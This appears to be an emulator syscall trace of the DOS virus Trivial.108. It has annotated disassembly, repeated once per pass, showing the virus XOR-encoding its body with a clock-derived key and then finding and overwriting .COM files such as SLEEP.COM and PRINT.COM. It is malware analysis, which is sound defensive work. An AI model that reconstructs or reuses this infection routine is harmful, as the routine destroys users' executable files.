Sample viewer

vx.netlux.org/Virus.DOS.Trivial.108


Syscalls:

Time Syscall Op Syscall Name
; Emulator disassembly from the return address of the logged "Get time" call.
; It XORs the bytes starting at offset 0x112 with one key byte into a buffer at
; 0x176, then searches for a file and opens the match for writing. The listing
; stops at 0x12a85; the writes and the close appear only as log rows below.
; NOTE(review): the left-hand addresses look like linear emulator addresses,
; while 0x109/0x112/0x166/0x176/0x9e are offsets in the program's segment.
; NOTE(review): 0x109 lies inside 0x100-0x111, the 18 bytes ahead of the encoded
; region; if the 18-byte write is that range, the key byte is stored in the
; clear in every written copy - confirm against the sample.
; Next line: key byte = DL from Get time (DOS 2Ch returns hundredths of a second in DL).
2018-12-17T22:31:17.903495181Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x176  ; destination buffer offset
0x12a63: mov cx, 0x5a  ; counter starts at 0x5a (90)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte (assumes DF is clear so SI advances - TODO confirm)
0x12a67: xor al, byte ptr [0x109]  ; single-byte XOR with the stored key
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte
0x12a6c: dec cx
; The loop exits only once CX wraps to 0xFFFF, so the body runs 0x5b (91) times,
; one more than the 90 bytes the log shows written at PC 12a99.
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax  ; AX comes from a push outside this listing; the log decodes the next int 0x21 as op 78, "Find first file"
0x12a73: xor cx, cx  ; CX = 0: attribute mask for the search
0x12a75: mov dx, 0x166  ; DS:DX = search pattern (presumably a *.COM mask, given the matched names - verify)
0x12a78: int 0x21
0x12a7a: jb 0x12aa2  ; carry set = search failed; the target lies outside this listing
0x12a7c: mov ax, 0x3d01  ; DOS 3Dh open, AL = 01 (write-only access)
0x12a7f: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e, the file-name field of the default DTA (assuming the DTA was not moved)
0x12a82: int 0x21  ; logged below as Open file (Filename = 'SLEEP.COM')
0x12a84: xchg ax, bx  ; handle to BX; the visible code does not test the open's carry flag
0x12a85: mov ah, 0x40  ; DOS 40h write; the log shows 18 + 90 bytes written with no seek logged after the open
2018-12-17T22:31:17.906711222Z 78 PC: 12a7a | Find first file
2018-12-17T22:31:17.91330442Z 61 PC: 12a84 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:31:17.920280629Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:17.927335452Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:17.931263462Z 62 PC: 12a9d | Close file
; Emulator disassembly from the return address of the logged "Get time" call
; (second pass of the same code). It XORs the bytes starting at offset 0x112
; with one key byte into a buffer at 0x176, then continues the file search and
; opens the match for writing. The listing stops at 0x12a85; the writes and the
; close appear only as log rows below.
; NOTE(review): the key is re-read from the clock on every pass, so each written
; copy may carry a different encoded body.
; Next line: key byte = DL from Get time (DOS 2Ch returns hundredths of a second in DL).
2018-12-17T22:31:17.944663035Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x176  ; destination buffer offset
0x12a63: mov cx, 0x5a  ; counter starts at 0x5a (90)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte (assumes DF is clear so SI advances - TODO confirm)
0x12a67: xor al, byte ptr [0x109]  ; single-byte XOR with the stored key
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte
0x12a6c: dec cx
; The loop exits only once CX wraps to 0xFFFF, so the body runs 0x5b (91) times,
; one more than the 90 bytes the log shows written at PC 12a99.
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax  ; AX comes from a push outside this listing; the log decodes the next int 0x21 as op 79, "Find next file"
0x12a73: xor cx, cx  ; CX = 0, set as a first search expects (attribute mask)
0x12a75: mov dx, 0x166  ; DS:DX = search pattern offset (presumably a *.COM mask, given the matched names - verify)
0x12a78: int 0x21
0x12a7a: jb 0x12aa2  ; carry set = no further match; the target lies outside this listing
0x12a7c: mov ax, 0x3d01  ; DOS 3Dh open, AL = 01 (write-only access)
0x12a7f: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e, the file-name field of the default DTA (assuming the DTA was not moved)
0x12a82: int 0x21  ; logged below as Open file (Filename = 'PRINT.COM')
0x12a84: xchg ax, bx  ; handle to BX; the visible code does not test the open's carry flag
0x12a85: mov ah, 0x40  ; DOS 40h write; the log shows 18 + 90 bytes written with no seek logged after the open
2018-12-17T22:31:17.946856617Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:17.949941806Z 61 PC: 12a84 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:31:17.956488037Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:17.963493747Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:17.966584508Z 62 PC: 12a9d | Close file
; Emulator disassembly from the return address of the logged "Get time" call
; (repeat pass of the same code). It XORs the bytes starting at offset 0x112
; with one key byte into a buffer at 0x176, then continues the file search and
; opens the match for writing. The listing stops at 0x12a85; the writes and the
; close appear only as log rows below.
; Next line: key byte = DL from Get time (DOS 2Ch returns hundredths of a second in DL).
2018-12-17T22:31:17.974837033Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x176  ; destination buffer offset
0x12a63: mov cx, 0x5a  ; counter starts at 0x5a (90)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte (assumes DF is clear so SI advances - TODO confirm)
0x12a67: xor al, byte ptr [0x109]  ; single-byte XOR with the stored key
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte
0x12a6c: dec cx
; The loop exits only once CX wraps to 0xFFFF, so the body runs 0x5b (91) times,
; one more than the 90 bytes the log shows written at PC 12a99.
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax  ; AX comes from a push outside this listing; the log decodes the next int 0x21 as op 79, "Find next file"
0x12a73: xor cx, cx  ; CX = 0, set as a first search expects (attribute mask)
0x12a75: mov dx, 0x166  ; DS:DX = search pattern offset (presumably a *.COM mask, given the matched names - verify)
0x12a78: int 0x21
0x12a7a: jb 0x12aa2  ; carry set = no further match; the target lies outside this listing
0x12a7c: mov ax, 0x3d01  ; DOS 3Dh open, AL = 01 (write-only access)
0x12a7f: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e, the file-name field of the default DTA (assuming the DTA was not moved)
0x12a82: int 0x21  ; logged below as Open file (Filename = 'HELLO.COM')
0x12a84: xchg ax, bx  ; handle to BX; the visible code does not test the open's carry flag
0x12a85: mov ah, 0x40  ; DOS 40h write; the log shows 18 + 90 bytes written with no seek logged after the open
2018-12-17T22:31:17.980855547Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:17.996970103Z 61 PC: 12a84 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:31:18.003983332Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:18.011004019Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:18.014626262Z 62 PC: 12a9d | Close file
; Emulator disassembly from the return address of the logged "Get time" call
; (repeat pass of the same code). It XORs the bytes starting at offset 0x112
; with one key byte into a buffer at 0x176, then continues the file search and
; opens the match for writing. The listing stops at 0x12a85; the writes and the
; close appear only as log rows below.
; Next line: key byte = DL from Get time (DOS 2Ch returns hundredths of a second in DL).
2018-12-17T22:31:18.022843618Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x176  ; destination buffer offset
0x12a63: mov cx, 0x5a  ; counter starts at 0x5a (90)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte (assumes DF is clear so SI advances - TODO confirm)
0x12a67: xor al, byte ptr [0x109]  ; single-byte XOR with the stored key
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte
0x12a6c: dec cx
; The loop exits only once CX wraps to 0xFFFF, so the body runs 0x5b (91) times,
; one more than the 90 bytes the log shows written at PC 12a99.
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax  ; AX comes from a push outside this listing; the log decodes the next int 0x21 as op 79, "Find next file"
0x12a73: xor cx, cx  ; CX = 0, set as a first search expects (attribute mask)
0x12a75: mov dx, 0x166  ; DS:DX = search pattern offset (presumably a *.COM mask, given the matched names - verify)
0x12a78: int 0x21
0x12a7a: jb 0x12aa2  ; carry set = no further match; the target lies outside this listing
0x12a7c: mov ax, 0x3d01  ; DOS 3Dh open, AL = 01 (write-only access)
0x12a7f: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e, the file-name field of the default DTA (assuming the DTA was not moved)
0x12a82: int 0x21  ; logged below as Open file (Filename = 'PHANG.COM')
0x12a84: xchg ax, bx  ; handle to BX; the visible code does not test the open's carry flag
0x12a85: mov ah, 0x40  ; DOS 40h write; the log shows 18 + 90 bytes written with no seek logged after the open
2018-12-17T22:31:18.025795913Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:18.029679482Z 61 PC: 12a84 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:31:18.037462111Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:18.044554756Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:18.048452012Z 62 PC: 12a9d | Close file
; Emulator disassembly from the return address of the logged "Get time" call
; (repeat pass of the same code). It XORs the bytes starting at offset 0x112
; with one key byte into a buffer at 0x176, then continues the file search and
; opens the match for writing. The listing stops at 0x12a85; the writes and the
; close appear only as log rows below.
; Next line: key byte = DL from Get time (DOS 2Ch returns hundredths of a second in DL).
2018-12-17T22:31:18.057046709Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x176  ; destination buffer offset
0x12a63: mov cx, 0x5a  ; counter starts at 0x5a (90)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte (assumes DF is clear so SI advances - TODO confirm)
0x12a67: xor al, byte ptr [0x109]  ; single-byte XOR with the stored key
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte
0x12a6c: dec cx
; The loop exits only once CX wraps to 0xFFFF, so the body runs 0x5b (91) times,
; one more than the 90 bytes the log shows written at PC 12a99.
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax  ; AX comes from a push outside this listing; the log decodes the next int 0x21 as op 79, "Find next file"
0x12a73: xor cx, cx  ; CX = 0, set as a first search expects (attribute mask)
0x12a75: mov dx, 0x166  ; DS:DX = search pattern offset (presumably a *.COM mask, given the matched names - verify)
0x12a78: int 0x21
0x12a7a: jb 0x12aa2  ; carry set = no further match; the target lies outside this listing
0x12a7c: mov ax, 0x3d01  ; DOS 3Dh open, AL = 01 (write-only access)
0x12a7f: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e, the file-name field of the default DTA (assuming the DTA was not moved)
0x12a82: int 0x21  ; logged below as Open file (Filename = 'PRINTA~1.COM')
0x12a84: xchg ax, bx  ; handle to BX; the visible code does not test the open's carry flag
0x12a85: mov ah, 0x40  ; DOS 40h write; the log shows 18 + 90 bytes written with no seek logged after the open
2018-12-17T22:31:18.059624387Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:18.06259782Z 61 PC: 12a84 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:31:18.070354595Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:18.076839462Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:18.080165664Z 62 PC: 12a9d | Close file
; Emulator disassembly from the return address of the logged "Get time" call
; (repeat pass of the same code). It XORs the bytes starting at offset 0x112
; with one key byte into a buffer at 0x176, then continues the file search and
; opens the match for writing. The listing stops at 0x12a85; the writes and the
; close appear only as log rows below.
; Next line: key byte = DL from Get time (DOS 2Ch returns hundredths of a second in DL).
2018-12-17T22:31:18.088568146Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x176  ; destination buffer offset
0x12a63: mov cx, 0x5a  ; counter starts at 0x5a (90)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte (assumes DF is clear so SI advances - TODO confirm)
0x12a67: xor al, byte ptr [0x109]  ; single-byte XOR with the stored key
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte
0x12a6c: dec cx
; The loop exits only once CX wraps to 0xFFFF, so the body runs 0x5b (91) times,
; one more than the 90 bytes the log shows written at PC 12a99.
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax  ; AX comes from a push outside this listing; the log decodes the next int 0x21 as op 79, "Find next file"
0x12a73: xor cx, cx  ; CX = 0, set as a first search expects (attribute mask)
0x12a75: mov dx, 0x166  ; DS:DX = search pattern offset (presumably a *.COM mask, given the matched names - verify)
0x12a78: int 0x21
0x12a7a: jb 0x12aa2  ; carry set = no further match; the target lies outside this listing
0x12a7c: mov ax, 0x3d01  ; DOS 3Dh open, AL = 01 (write-only access)
0x12a7f: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e, the file-name field of the default DTA (assuming the DTA was not moved)
0x12a82: int 0x21  ; logged below as Open file (Filename = 'MANDEL.COM')
0x12a84: xchg ax, bx  ; handle to BX; the visible code does not test the open's carry flag
0x12a85: mov ah, 0x40  ; DOS 40h write; the log shows 18 + 90 bytes written with no seek logged after the open
2018-12-17T22:31:18.090871978Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:18.094437615Z 61 PC: 12a84 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:31:18.101884619Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:18.108755891Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:18.111650245Z 62 PC: 12a9d | Close file
; Emulator disassembly from the return address of the logged "Get time" call
; (repeat pass of the same code). It XORs the bytes starting at offset 0x112
; with one key byte into a buffer at 0x176, then continues the file search and
; opens the match for writing. The listing stops at 0x12a85; the writes and the
; close appear only as log rows below.
; Next line: key byte = DL from Get time (DOS 2Ch returns hundredths of a second in DL).
2018-12-17T22:31:18.121044941Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x176  ; destination buffer offset
0x12a63: mov cx, 0x5a  ; counter starts at 0x5a (90)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte (assumes DF is clear so SI advances - TODO confirm)
0x12a67: xor al, byte ptr [0x109]  ; single-byte XOR with the stored key
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte
0x12a6c: dec cx
; The loop exits only once CX wraps to 0xFFFF, so the body runs 0x5b (91) times,
; one more than the 90 bytes the log shows written at PC 12a99.
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax  ; AX comes from a push outside this listing; the log decodes the next int 0x21 as op 79, "Find next file"
0x12a73: xor cx, cx  ; CX = 0, set as a first search expects (attribute mask)
0x12a75: mov dx, 0x166  ; DS:DX = search pattern offset (presumably a *.COM mask, given the matched names - verify)
0x12a78: int 0x21
0x12a7a: jb 0x12aa2  ; carry set = no further match; the target lies outside this listing
0x12a7c: mov ax, 0x3d01  ; DOS 3Dh open, AL = 01 (write-only access)
0x12a7f: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e, the file-name field of the default DTA (assuming the DTA was not moved)
0x12a82: int 0x21  ; logged below as Open file (Filename = 'PAH.COM')
0x12a84: xchg ax, bx  ; handle to BX; the visible code does not test the open's carry flag
0x12a85: mov ah, 0x40  ; DOS 40h write; the log shows 18 + 90 bytes written with no seek logged after the open
2018-12-17T22:31:18.123349868Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:18.126287042Z 61 PC: 12a84 | Open file (Filename = 'PAH.COM')
2018-12-17T22:31:18.133857582Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:18.140819739Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:18.143780052Z 62 PC: 12a9d | Close file
; Emulator disassembly from the return address of the logged "Get time" call
; (repeat pass of the same code). It XORs the bytes starting at offset 0x112
; with one key byte into a buffer at 0x176, then continues the file search and
; opens the match for writing. The listing stops at 0x12a85; the writes and the
; close appear only as log rows below.
; Next line: key byte = DL from Get time (DOS 2Ch returns hundredths of a second in DL).
2018-12-17T22:31:18.152287225Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x176  ; destination buffer offset
0x12a63: mov cx, 0x5a  ; counter starts at 0x5a (90)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte (assumes DF is clear so SI advances - TODO confirm)
0x12a67: xor al, byte ptr [0x109]  ; single-byte XOR with the stored key
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte
0x12a6c: dec cx
; The loop exits only once CX wraps to 0xFFFF, so the body runs 0x5b (91) times,
; one more than the 90 bytes the log shows written at PC 12a99.
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax  ; AX comes from a push outside this listing; the log decodes the next int 0x21 as op 79, "Find next file"
0x12a73: xor cx, cx  ; CX = 0, set as a first search expects (attribute mask)
0x12a75: mov dx, 0x166  ; DS:DX = search pattern offset (presumably a *.COM mask, given the matched names - verify)
0x12a78: int 0x21
0x12a7a: jb 0x12aa2  ; carry set = no further match; the target lies outside this listing
0x12a7c: mov ax, 0x3d01  ; DOS 3Dh open, AL = 01 (write-only access)
0x12a7f: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e, the file-name field of the default DTA (assuming the DTA was not moved)
0x12a82: int 0x21  ; logged below as Open file (Filename = 'TEST.COM')
0x12a84: xchg ax, bx  ; handle to BX; the visible code does not test the open's carry flag
0x12a85: mov ah, 0x40  ; DOS 40h write; the log shows 18 + 90 bytes written with no seek logged after the open
2018-12-17T22:31:18.154854665Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:18.15783294Z 61 PC: 12a84 | Open file (Filename = 'TEST.COM')
2018-12-17T22:31:18.166211599Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:18.169054389Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:18.17206746Z 62 PC: 12a9d | Close file
; Emulator disassembly from the return address of the logged "Get time" call
; (repeat pass of the same code). It XORs the bytes starting at offset 0x112
; with one key byte into a buffer at 0x176, then continues the file search.
; The visible trace ends at the "Find next file" row after this listing, so
; whether the open and write below ran on this pass cannot be told from here.
; Next line: key byte = DL from Get time (DOS 2Ch returns hundredths of a second in DL).
2018-12-17T22:31:18.180882658Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112  ; source offset of the bytes to encode
0x12a60: mov di, 0x176  ; destination buffer offset
0x12a63: mov cx, 0x5a  ; counter starts at 0x5a (90)
0x12a66: lodsb al, byte ptr [si]  ; al = next source byte (assumes DF is clear so SI advances - TODO confirm)
0x12a67: xor al, byte ptr [0x109]  ; single-byte XOR with the stored key
0x12a6b: stosb byte ptr es:[di], al  ; store the encoded byte
0x12a6c: dec cx
; The loop exits only once CX wraps to 0xFFFF, so the body runs 0x5b (91) times,
; one more than the 0x5a loaded into CX.
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax  ; AX comes from a push outside this listing; the log decodes the next int 0x21 as op 79, "Find next file"
0x12a73: xor cx, cx  ; CX = 0, set as a first search expects (attribute mask)
0x12a75: mov dx, 0x166  ; DS:DX = search pattern offset (presumably a file mask - verify against the sample)
0x12a78: int 0x21
0x12a7a: jb 0x12aa2  ; carry set = no further match; the target lies outside this listing
0x12a7c: mov ax, 0x3d01  ; DOS 3Dh open, AL = 01 (write-only access)
0x12a7f: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e, the file-name field of the default DTA (assuming the DTA was not moved)
0x12a82: int 0x21  ; no log row for this call is visible on this pass
0x12a84: xchg ax, bx  ; handle to BX; the visible code does not test the open's carry flag
0x12a85: mov ah, 0x40  ; DOS 40h write function number; the listing ends before the call itself
2018-12-17T22:31:18.183532084Z 79 PC: 12a7a | Find next file